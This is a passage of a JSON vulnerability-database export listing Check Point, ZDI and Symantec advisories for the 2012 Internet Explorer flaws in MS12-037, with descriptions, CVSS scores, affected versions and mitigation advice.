Code Execution (MS12-037; CVE-2012-1878)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1878"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-257", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:10:49", "description": "An information disclosure vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Process Memory Information Disclosure (MS12-037; CVE-2012-1873)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1873"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-249", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:23:45", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in the way Internet Explorer accesses an object that has been deleted. A remote attacker could trigger this vulnerability by enticing an unsuspecting victim to open a specially crafted web page. Successful exploitation may cause a memory corruption in a way that will allow an attacker to execute arbitrary code on an affected system, in the security context of the logged on user.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Same ID Property Remote Code Execution (MS12-037; CVE-2012-1875)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1875"], "modified": "2015-05-04T00:00:00", "id": "CPAI-2012-248", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:10:00", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer OnRowsInserted Event Remote Code Execution (MS12-037; CVE-2012-1881)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1881"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-252", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:11:55", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer insertAdjacentText Remote Code Execution (MS12-037; CVE-2012-1879)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1879"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-258", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T19:56:15", "description": "An information disclosure vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way that the toStaticHTML API within Internet Explorer handles content using specific strings when sanitizing HTML. A remote attacker could exploit this vulnerability by enticing a target user to open a specially crafted web page. Successful exploitation could allow an attacker to perform cross-site scripting attacks against affected users, resulting in script execution in the target's security context.", "cvss3": {}, "published": "2015-05-18T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer HTML Sanitization Information Disclosure (MS12-037) - Ver2 (CVE-2012-1858)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1858"], "modified": "2015-05-18T00:00:00", "id": "CPAI-2015-0698", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-11-28T07:11:40", "description": "A cross-site scripting vulnerability has been reported in Microsoft SharePoint.", "cvss3": {}, "published": "2012-07-10T00:00:00", "type": "checkpoint_advisories", "title": "Preemptive Protection against Microsoft SharePoint HTML Sanitization Cross-site Scripting (MS12-050; CVE-2012-1858)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1858"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-309", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:09:08", "description": "An information disclosure vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer HTML Sanitization Information Disclosure (MS12-039; CVE-2012-1858)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1858"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-255", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T11:56:55", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in the way Internet Explorer accesses an object that has been deleted. A remote attacker could trigger this vulnerability by enticing an unsuspecting victim to open a specially crafted web page. Successful exploitation may cause a memory corruption in a way that will allow an attacker to execute arbitrary code on an affected system, in the security context of the logged on user.", "cvss3": {}, "published": "2014-12-28T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Center Element Remote Code Execution (MS12-037) - Ver2 (CVE-2012-1523)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1523"], "modified": "2014-12-28T00:00:00", "id": "CPAI-2014-2431", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:12:33", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in the way Internet Explorer accesses an object that has been deleted. A remote attacker could trigger this vulnerability by enticing an unsuspecting victim to open a specially crafted web page. Successful exploitation may cause a memory corruption in a way that will allow an attacker to execute arbitrary code on an affected system, in the security context of the logged on user.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Center Element Remote Code Execution (MS12-037; CVE-2012-1523)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1523"], "modified": "2016-12-26T00:00:00", "id": "CPAI-2012-262", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:12:41", "description": "A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in the way Internet Explorer attempts to access a non-existent object. A remote attacker could trigger this vulnerability by enticing an unsuspecting victim to open a specially crafted web page. Successful exploitation may cause a memory corruption in a way that will allow an attacker to execute arbitrary code on an affected system, in the security context of the logged on user.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Col Element Remote Code Execution (MS12-037; CVE-2012-1876)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2016-02-28T00:00:00", "id": "CPAI-2012-251", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:10:16", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Internet Explorer Developer Toolbar Remote Code Execution (MS12-037; CVE-2012-1874)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1874"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-264", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2023-06-05T15:22:56", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in the 'onpropertychange' user callback function for the document.title. If the function changes the document in the callback function by using, for example, a document.write call, this can result in a use-after-free vulnerability. This can lead to remote code execution under the context of the program.", "cvss3": {}, "published": "2012-12-21T00:00:00", "type": "zdi", "title": "Microsoft Internet Explorer Title Element Change Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1877"], "modified": "2012-12-21T00:00:00", "id": "ZDI-12-190", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-190/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:22:55", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Internet Explorer handles consecutive calls to insertRow. When the number of rows reaches a certain threshold the program fails to correctly relocate certain key objects. This can lead to a use-after-free vulnerability which can result in remote code execution under the context of the current process.", "cvss3": {}, "published": "2012-12-21T00:00:00", "type": "zdi", "title": "Microsoft Internet Explorer insertRow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1880"], "modified": "2012-12-21T00:00:00", "id": "ZDI-12-192", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-192/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:22:54", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Internet Explorer handles the onbeforedeactivate callback function for certain elements. During the execution of the onbeforedeactivate callback function it is possible to alter the DOM tree of the page which can lead to a use-after-free vulnerability when the function returns. This can result in remote code execution under the context of the current process.", "cvss3": {}, "published": "2012-12-21T00:00:00", "type": "zdi", "title": "Microsoft Internet Explorer OnBeforeDeactivate Event Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1878"], "modified": "2012-12-21T00:00:00", "id": "ZDI-12-194", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-194/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:22:57", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Internet Explorer handles 'onrowsinserted' callback functions for certain elements. It is possible to alter the document DOM tree in a onrowsinserted callback function which can lead to a use-after-free condition when the function returns. This can result in remote code execution under the context of the current process.", "cvss3": {}, "published": "2012-12-21T00:00:00", "type": "zdi", "title": "Microsoft Internet Explorer OnRowsInserted Event Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1881"], "modified": "2012-12-21T00:00:00", "id": "ZDI-12-188", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-188/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:22:55", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Internet Explorer handles repeated calls to insertAdjacentText. When the size of the element reaches a certain threshold Internet Explorer fails to correctly relocate key elements. An unitialized variable in one of the function can cause memory corruption. This can lead to remote code execution under the context of the program.", "cvss3": {}, "published": "2012-12-21T00:00:00", "type": "zdi", "title": "Microsoft Internet Explorer insertAdjacentText Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1879"], "modified": "2012-12-21T00:00:00", "id": "ZDI-12-193", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-193/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:23:30", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Internet Explorer handles dynamically changed colspans on a column in a table with the table-layout:fixed style. If the colspan is increased after initial creation it will result in a heap overflow. This can lead to remote code execution under the context of the current program.", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "zdi", "title": "(Pwn2Own) Microsoft Internet Explorer Fixed Table Colspan Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2012-06-12T00:00:00", "id": "ZDI-12-093", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-093/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:04:12", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1877 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1877"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53866", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53866", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:20", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1880 'insertRow()' Method Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1880"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53869", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53869", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:19", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1878 'OnBeforeDeactivate' Event Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1878"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53867", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53867", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:17", "description": "### Description\n\nMicrosoft Internet Explorer is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nWhen possible, run all software as a user with minimal privileges and limited access to system resources. Use additional precautions such as restrictive environments to insulate software that may potentially handle malicious content.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nVendor updates are available. Please see the references for details.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1873 Null Byte Handling Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1873"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53844", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53844", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:04:18", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1875 Same ID Property Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53847", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53847", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:14", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "cvss3": {}, "published": "2012-06-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1881 'OnRowsInserted' Event Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1881"], "modified": "2012-06-12T00:00:00", "id": "SMNTC-53870", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53870", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:14", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 